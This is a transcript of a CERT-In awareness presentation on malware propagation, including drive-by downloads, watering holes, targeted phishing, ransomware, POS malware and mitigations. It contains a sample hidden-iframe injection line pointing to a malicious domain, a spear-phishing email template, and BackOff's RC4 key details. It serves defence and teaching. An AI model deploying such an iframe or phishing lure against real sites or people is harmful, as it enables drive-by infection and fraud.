malware propagation & attacks trends
Post on 18-Apr-2022
7 Views
Preview:
TRANSCRIPT
Malware propagation & attacks trends
Aroma Gupta, Bhavya Jain (Bhupendra Singh Awasya, Scientist ‘C’, [GCIH, GREM])
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology Department of Information Technology
Government of India
Topics of Discussion • Introduction :
– Security Definitions – Malware
• Malware Propagation Methods • Attack Methodology
– Drive-by-download – Watering hole attack – Client side/Targeted attacks/RATS
– DNS Changer Malware – Rogue software – Web Attack Toolkits – Mobile malware threats
• Actions and countermeasures
Security Related Concepts
National level
• Cyber Terrorism • Attacks on Critical
Infrastructure • Web defacement • Website intrusion and
malware propagation • Malicious Code • Scanning and probing • Denial of Service &
Distributed Denial of Service
• Cyber espionage
Organisational level
• Website intrusion/ defacement
• Domain stalking • Malicious Code • Scanning and probing • Denial of Service &
Distributed Denial of Service
• Targeted attacks • Phishing • Data theft • Insider threats • Financial frauds
Individual level
• Social Engineering • Email hacking & misuse • Identity theft & phishing • Financial scams • Abuse through emails • Abuse through Social
Networking sites • Laptop theft
Cyber threats
Malware(“Mal”icious+Soft”ware”) • It refers to the various intrusive software that are capable of
gaining unauthorized access thereby leading to data/system compromise.
Malware Propagation Malware propagation refer to the method by which malware is transmitted to an information system, platform or device it seeks to infect. Propagation Methods:
More Propagation Tactics
Source: Microsoft
Mobile Malware Evolution
Mobile OS market share
Mobile Malware Threats • For Financial Gain/Loss Unnecessary calls/SMS/MMS Send & sell private information • Cause phones to work slowly or crash • Wipe out contact books or other
information on the phone • Remote control of the phone • Install false applications
Mobile Threats
Ad Jacking
SMS Trojan
Android Malware Count
Mobile Malware Count
Behaviour Based Platform Based
Drive-by-download
It includes: • User clicks but unaware of the consequences: e.g. Install Flash Plugin.
• User unaware of the download: eg. Installation of ad-wares while browsing.
Download of Malicious content from the internet without the user intervention
1.2 Infect a legitimate website
1.1 Create a Malicious website
Legitimate website
Malicious website
Attacker
2 User request legitimate website
3 Website response including malicious code
4 User’s browser request for content from malicious website
5 Malicious website successfully delivers malware/virus
Legitimate user’s system
Req.
Resp.
Connect Attacker
Drive-by-download strategy
• hxxp://legitimate.site/css/indexs.php
Reason: Embedded Iframe in legitimate Site <iframe src=www.maliciousdomain.com width=0 height=0 ></iframe>
Example:
Quick Response Code (QR Code)
Use your tablet or phone camera to scan this image to visit our website!
• Visit our Website @
!! What if Setup by Attacker- Social-Engineer Toolkit (SET) for Launching Attack!!
Rouge antivirus "AVG -Antivirus 2011" shortcut icon:
Rogue Software
Social Networking-Spreading rogue antivirus
Cryptolocker-Top Ransomeware 2013 • Encrypts files-local drives, shared network drives, USB drives,
external hard drives, network file shares and even some cloud storage drives
• Server generates a 2048-bit RSA key pair, and sends the public key back to the infected computer
• Demands Ransom amount against decryption key.
Recently Fireeye.com has provided a means for decrypting your file encrypted using cryptolocker.
• http://www.fireeye.com/blog/corporate/2014/08/your-locker-of-information-for-cryptolocker-decryption.html
• https://www.DecryptCryptoLocker.com Note : Keep regular backups of your files
BackOff POS malware:
• Belongs to the family of malware targeting Point of sale(POS) systems to steals customers payment cards data i.e. track1 and track2 information containing user name, password, CVV number etc.
• Propagation Mechanism: Scanning and brute forcing systems running Remote desktop Applications such as Microsoft Remote desktop, apple remote desktop, Splashtop2 etc.
• OS Targeted: Microsoft Windows
• Communicates and execute commands received from Command and Control server such as Update, Terminate ,Uninstall, Download and Run, Upload KeyLogs etc .
• Sends exfiltrated data to the C2 sever. • Injects malicious stub into windows "Explorer.exe" for persistence, in case malicious file crashes or
stopped forcefully.
• C2 Communication:
Key logging Routine
Password for the RC4 algorithm is MD5 of string generated by a concatenation of the ‘id’ parameter, a static string of ‘jhgtsd7fjmytkr’, and the ‘ui’ parameter.
Stolen data encrypted using RC4 algorithm and
then encoded using Base64
ID and UI parameter used in
RC4 password
Watering Hole Attack Refers to technique to target a particular organization by compromising websites that the targets use to visit The attack consists of following phases:
– Identify target – Observe the websites the group often uses. Eg. – Infect one or more of these websites with malware. – Eventually, some member of the targeted group will get
infected.
Recent vulnerability used in watering hole attacks: IE zero day Vulnerability(CVE-2013-1347)
Working
• One of the most prevalent technique of targeted attacks
Once the malware/virus is planted on user's computer, a remote attacker/hacker can: - Access - credential stealing - Use as a launching pad for further attacks - Install other malwares/viruses Can Lead to complete Compromise of the system.
Botnet Trends- INDIA 2013
Targeted Attacks Refers to the attack technique where in attacker
targets either an individual or an organization. It includes: • Profiling of an individual or organization • Gathering information via social engineering
Purpose: Stealing specific information.
• URL shortening services like, for hiding the actual URL http://tinyurl.com/
http://bit.ly/ eg : shortened URL for “www.cert-in.org.in” is “http://bit.ly/1wvvBLU”
-Malicious Email attachments (PDF, DOC, XLS, SWF, PPT) Mostly exploited : CVE-2010-3333, CVE-2012-0158, cve-2009-4324
- Extension hiding techniques
Techniques of Targeted attacks
Targeted attacks - example
From: Sr Manager [mailto:employee@abc.com] Sent: Tuesday, 19 January, 2010 5:14 PM To: employee@abc.com bcc: Target1@abc.com, target2@abc.com Subject: Urgent document for agenda items for the coming meeting Dear Mr. (Target) I am attaching the agenda items for a probable meeting for discussing briefing points for the board meeting. For confidentiality reasons the attached file is password protected, the password for the attached file is:- “abc123”. Please have a look and send your comments and input material to me ASAP. Regards ABC
URL Shortening & Extension Hiding Technique
Note: The URL points to an executable, which is pretending video file (.wmv) with actual file extension as (.scr)
Link in E-mail:
Extension Hiding Technique
Upon UNZIP, .docx (word document) file is extracted, which is actually a SCR file as shown below:
Note: The dropped file is pretending to be a Microsoft Office Word
Document file but actually it is a self extracting archive file with extension as “.scr” (screen saver file)
Extension shown as “docx” -a word document Extension
Self Extracting Archive Icon Actual Extension is “.scr”
---screen saver file
Most targeted OS and Applications 2013
Source: GFI
How attacker can change the world: Discussion on “DNS
Changer Malware”: operation click ghost
• 4 million computers infected.
• Routers with default username and password are
exploited
• The malware hijacks DNS on infected system
9
Attack Toolkits
Attack toolkits are malicious toolkits containing various exploits bundled
into a single package
Working of WEB Attack Toolkit
Attack Toolkit - MPack
Securing against drive-by-download attacks:
• Use of Web Filtering software: • Enable smart screen Filters ( available only in Internet
Explorer) • Use Web browser plugins:
– Eg. Noscript, Adblocker plugins of firefox
• Using different and secure Web Browsers: – Eg. Mozilla firefox with preinstalled Google safe browsing feature.
Enable Smart Screen Filter (IE)
This feature is to block fake or malicious sites from distributing questionable or download malicious software to the victim's system
Browser Plug-in • Noscript (Firefox Plug-in): Will allow you to run JavaScript ,Java and flash only on
trusted websites that is chosen by the user. Browser Settings options plugins search for “Noscript”
Install-> restart browser
• Adblock (Firefox Plug-in): Prevents any malicious adds from being executed. Browser Settings options plugins search for “adblock”
plugin install restart browser. Note: many more add-ons and Plug-ins are available for IE, chrome and
Firefox.
Configuring Google Chrome Goto Chrome Settings show advance settings Privacy
Content Settings
Disable JavaScript
Enable phishing and malware protection
Keep Google updated
Configure EMET(Enhanced Mitigation and Experienced Toolkit)
Provides end node protection against zero day vulnerabilities and blocks and prevents memory based attack approaches.
Configuring Microsoft Office Word • Disable ActiveX controls: Click Office Button-> Word Options -> Trust center-> Trust Center
Settings-> ActiveX Settings
• Disable Macros Office Button-> Word Options -> Trust center-> Trust Center
Settings-> Macros Settings
• Open the Microsoft Office word documents in Protected view
Office Button-> Word Options -> Trust center-> Trust Center Settings->Protected View
Configuring Adobe • Goto Edit Preferences
Actions at organisational level • Security policies and procedures • CSIRT/CISO/Administrator/Users • Multi-layered defense mechanism
– Network behavior analysis – Perimeter Defense – Security Information and Event Management – Database Activity Monitoring
• Updated/Patched applications • Host based Intrusion Prevention System • Pre defined procedures for information sharing • Authentication & authorisation to secure information and prevent data
leakage • Authentication of emails (Digital signatures) • Auditing and Pentest • User awareness
Actions at User/Organisation level • Perform scanning on computer for possible infection with the removal tools
mentioned below. • Conduct routine backups of important files, keeping the backups stored offline. • Disconnect the infected system from wireless or wired networks to prevent the
malware from further encrypting files stored over network shares • Exercise caution while visiting links within emails received from untrusted users
or unexpectedly received from trusted users. • Do not download and open attachments in emails received from untrusted users
or unexpectedly received from trusted users • Exercise caution while visiting links to web pages. • Protect yourself against social engineering attacks. • Do not visit untrusted websites. • Enable firewall at desktop and gateway level and disable ports that are not
required. • Avoid downloading pirated software. • Keep up-to-date patches and fixes on the operating system and application
softwares • Keep up-to-date antivirus and antispyware signatures at desktop and gateway
level.
Thank you
Incident Response Helpdesk
Phone: 1800 11 4949
FAX: 1800 11 6969
e-mail: incident@cert-in.org.in
http://www.cert-in.org.in
top related